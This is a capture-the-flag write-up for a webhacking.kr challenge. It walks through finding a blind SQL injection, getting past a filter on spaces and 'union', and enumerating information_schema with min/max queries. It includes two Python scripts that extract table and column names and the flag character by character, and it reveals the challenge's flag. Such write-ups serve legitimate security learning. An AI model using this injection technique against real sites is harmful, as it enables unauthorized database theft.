This problem is in webhacking.kr.
URL: https://webhacking.kr/challenge/web-10//
If you enter the URL, you can see the below photo.
This page informs that you should use SQL Injection to get the Flag.
Then, I tried to enter zero.
Next, I tried to enter one.
we can confirm that the result is changed by the input.
If you enter a non-one, the result will be zero.
Through this, we can consider that Blind SQL Injection has to be used this problem to solve.
Therefore, I tried to attack the Blind SQL Injection.
union, 0' or 1=1#, 0' or 1=1--, etc ...
But, the union, space, and some characters were all encoded and could not be attempted.
Then, I found out that Blind SQL Injection will be done by trying as below.
Through this, I was confident and wrote the Query Statement.
Supplementary Explanation (See only those who don't know about DB)
mysql> select schema_name from information_schema.schemata; (= show databases;)
The database named "information_schema" has diverse information.
As you can see in the picture above, we will test specific situations in the columns table of the information_scema database.
In Information_scema database, the schemata table contains information such as schema_name and table_name.
In addition, the columns table has table_schema, table_name, and columnn_name.
mysql> select min(concat(table_schema," ", table_name," ", column_name)) from information_schema.columns;
This query statement shows the first result information_schema.column table among the combined results of table_schema, table_name, and columnn_name.
mysql> select max(concat(table_schema," ", table_name," ", column_name)) from information_schema.columns;
This query statement shows the end result information_schema.column table among the combined results of table_schema, table_name, and columnn_name.
In other words, Since the limit is not available for protm13, it is necessary to run Blind SQL injection using max, min.
First, Database Name, Table Name, Column Name
import requests
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'}
def HttpRequest():
# Find out (Database Name, Table Name, Column Name)
result = ""
for i in range(1,40):
check = False
for j in range(48, 128): # 0~9, a-z, A-Z, etc..
url = 'https://webhacking.kr/challenge/web-10/?no=ord(substr((select(min(concat(table_schema,00,table_name,00,column_name)))from(information_schema.columns)),{},1))in({})'.format(i,j)
res = requests.get(url, headers=headers, cookies=cookies)
if '<td>1</td>' in res.text:
result += chr(j)
check = True
if check == False:
arr = result.split("0")
print("Database Name: {}".format(arr[0]))
print("Table Name: {}".format(arr[1]))
print("Column Name: {}".format(arr[2]))
Then, In concatenation, 00 is input to distinguish from each result (because spaces are encoded).
This work will show the result. ("DB Name, Table Name, Column Name")
After finishing the work, you can get the flag.
DB Name: chall13
Table Name: flag_ab733768
Column Name: flag_3a55b31d
Second, Blind SQL Injection (Get Flag)
#Get Flag
result = ""
for i in range(1,40):
check = False
for j in range(48,128):
url = 'https://webhacking.kr/challenge/web-10/?no=ord(substr((select(max(flag_3a55b31d))from(flag_ab733768)),{},1))in({})'.format(i,j)
res = requests.get(url,headers=headers, cookies=cookies)
if '<td>1</td>' in res.text:
result += chr(j)
check = True
if check == False:
print("Flag: {}".format(result))
Then, I tried to use the min function to get the flag.
As a result, the Flag was shown like the below photo.
But, the flag is incorrect, so I tried to use the max function to get the other flag.
As a result, the Flag was shown like the below photo.
In conclusion, we can know the flag.
Flag: FLAG{challenge13gummyclear}
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